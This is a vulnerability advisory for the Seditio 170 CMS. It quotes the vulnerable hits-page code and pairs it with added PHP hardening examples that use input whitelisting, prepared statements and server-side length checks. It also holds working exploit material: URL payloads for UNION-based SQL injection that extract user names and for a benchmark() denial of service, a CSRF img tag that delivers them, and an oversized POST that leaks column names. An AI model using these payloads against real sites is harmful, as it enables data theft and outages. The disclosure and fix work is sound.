Vuln Desc:
Seditio 170 (seditio-build170.20120302) is prone to an SQL injection vulnerability.
Note: successful exploitation requires administrative authentication to the system.
//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT'); // 'f' is read from the GET query string through the 'TXT' filter
$v = sed_import('v','G','TXT'); // 'v' likewise; the 'TXT' filter does not neutralise single quotes, as the requests below show
if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
// $v is concatenated straight into the LIKE pattern: no escaping and no check that it is a numeric period value
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");
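The fix for this section is to stop treating 'v' as free text: accept only values shaped like a period identifier and pass them to the database as a bound parameter rather than by string concatenation. The following is an added example of that hardening, not Seditio's own code. It assumes a PDO connection in $db, the stats table name in $db_stats, and that legitimate period values are a four-digit year or a year-month ('2012-04'); the patterns are assumptions and should be adjusted to the real stat_name format.

```php
<?php
// Added example, not Seditio's own code: a hardened replacement for the hits query.
// Assumptions: a PDO connection is available in $db, the stats table name is in
// $db_stats, and legitimate period values are a 4-digit year ('2012') or a
// year-month ('2012-04'); adjust the patterns if the real stat_name format differs.

/**
 * Validate the 'f' (period type) and 'v' (period value) request parameters.
 * Returns the value if it matches the expected shape for that period type,
 * otherwise null. Anything containing quotes, spaces or SQL keywords fails here.
 */
function hits_validate(string $f, string $v): ?string
{
    $patterns = array(
        'year'  => '/^\d{4}$/',          // assumed format
        'month' => '/^\d{4}-\d{2}$/',    // assumed format
    );
    if (!isset($patterns[$f]) || !preg_match($patterns[$f], $v)) {
        return null;
    }
    return $v;
}

/**
 * Build and run the statistics query as a prepared statement.
 * The validated value is bound as a parameter, so even if validation were
 * relaxed later the value could not change the structure of the query.
 * Returns the matching rows, or an empty array when the input is rejected.
 */
function hits_query(PDO $db, string $db_stats, string $f, string $v): array
{
    $clean = hits_validate($f, $v);
    if ($clean === null) {
        return array();   // rejected: no SQL is executed at all
    }
    $stmt = $db->prepare("SELECT * FROM `$db_stats` WHERE stat_name LIKE :v ORDER BY stat_name DESC");
    $stmt->execute(array(':v' => $clean . '%'));   // prefix match; the value travels as data, not SQL
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration against an in-memory SQLite database with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db_stats = 'sed170_stats';
$db->exec("CREATE TABLE `$db_stats` (stat_name TEXT, stat_value INTEGER)");
$db->exec("INSERT INTO `$db_stats` VALUES ('2012-04', 10), ('2012-03', 7), ('2011-12', 99)");

// A valid year: returns every month row of 2012.
echo count(hits_query($db, $db_stats, 'year', '2012')), "\n";
// A valid month: returns that single row.
echo count(hits_query($db, $db_stats, 'month', '2012-03')), "\n";
// A quote-bearing value of the kind used in the advisory: rejected before any query runs.
echo count(hits_query($db, $db_stats, 'year', "1' union select 1,1--")), "\n";
```

The whitelist alone closes both the data-extraction and the benchmark()-based denial-of-service requests shown below, because neither survives the regular expression; the prepared statement is the second layer in case the validation is ever loosened.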
Exploit:
Extract user/admin/moderator details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--
Overload the MySQL server (as a result the MySQL server goes down with high CPU load; in other words, a denial of service through SQL injection):
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: it can be combined with CSRF, especially if you have no admin access to the system.
For example:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />
Screenshot:
http://s019.radikal.ru/i625/1204/6d/842088135393.png
Information Disclosure:
Post a very long string into the profile inputs.
The application exposes column names in its error message, which is not acceptable from a security standpoint.
For example:
Client-side validation only (maxlength is enforced by the browser, not the server):
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>
http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP
Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1
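The root cause is twofold: the length limit lives only in the HTML maxlength attribute, and the raw database error is printed to the page. The following is an added example of the server-side counterpart, not Seditio's own code. It assumes the sed170_users table and user_* column naming visible in the page's error message; the 64-character limit for the location field comes from the form above, the other limits are assumed.

```php
<?php
// Added example, not Seditio's own code: server-side length checks that mirror the
// form's maxlength attributes, and error handling that keeps the database message
// out of the response. Assumptions: the user table and column names follow the
// sed170_users / user_* naming visible on the page; the limits other than the
// 64 from maxlength="64" are assumed.

const PROFILE_FIELD_LIMITS = array(
    'ruserlocation'   => 64,   // matches maxlength="64" on the Location input
    'ruserwebsite'    => 64,   // assumed
    'ruseroccupation' => 64,   // assumed; the page's error names column user_occupation
);

/**
 * Return the names of posted fields whose value exceeds the server-side limit.
 * strlen() counts bytes, which can only over-count multibyte text, so a value
 * that passes here also fits a column whose limit is defined in characters.
 */
function profile_oversized_fields(array $post): array
{
    $bad = array();
    foreach (PROFILE_FIELD_LIMITS as $field => $limit) {
        if (isset($post[$field]) && strlen((string) $post[$field]) > $limit) {
            $bad[] = $field;
        }
    }
    return $bad;
}

/**
 * Apply a profile update. Oversized input is rejected before any SQL runs; if
 * the database still raises an error, the detailed message goes to the server
 * log and the client only sees a generic message. Returns the user-facing text.
 */
function profile_update(PDO $db, int $userId, array $post): string
{
    $oversized = profile_oversized_fields($post);
    if ($oversized !== array()) {
        return 'Input too long: ' . implode(', ', $oversized);
    }
    try {
        $stmt = $db->prepare('UPDATE sed170_users SET user_location = :loc, user_website = :web, user_occupation = :occ WHERE user_id = :id');
        $stmt->execute(array(
            ':loc' => $post['ruserlocation'] ?? '',
            ':web' => $post['ruserwebsite'] ?? '',
            ':occ' => $post['ruseroccupation'] ?? '',
            ':id'  => $userId,
        ));
        return 'Profile updated';
    } catch (PDOException $e) {
        error_log('profile_update failed: ' . $e->getMessage());   // details stay server-side
        return 'Profile could not be saved';                        // no column names reach the client
    }
}

// Demonstration with an in-memory SQLite database and constructed sample data.
// The CHECK constraint stands in for MySQL's "Data too long for column" error.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sed170_users (user_id INTEGER PRIMARY KEY, user_location TEXT, user_website TEXT, user_occupation TEXT CHECK (length(user_occupation) <= 64))');
$db->exec("INSERT INTO sed170_users VALUES (1, '', '', '')");

$normal = array('ruserlocation' => 'Somewhere', 'ruserwebsite' => 'example.invalid', 'ruseroccupation' => 'admin');
echo profile_update($db, 1, $normal), "\n";   // accepted and written

$long = $normal;
$long['ruseroccupation'] = str_repeat('A', 1000);   // the advisory's oversized input: rejected before any SQL
echo profile_update($db, 1, $long), "\n";
```

Even with the length check in place, the catch branch matters: any database failure that does slip through is logged with its full text, while the response stays generic, so the schema is never described to the client the way the "Data too long for column 'user_occupation'" message above does.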
Persistent cross-site scripting vulnerability still unfixed (since Seditio 161).
Same info/path disclosures still unfixed (since Seditio 161).
("Thanks" to the TinyMCE editor and thanks to client-side validation) (since Seditio 161)
I notified about it here and to the vendor too, but it is still unfixed in 170.20120302.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^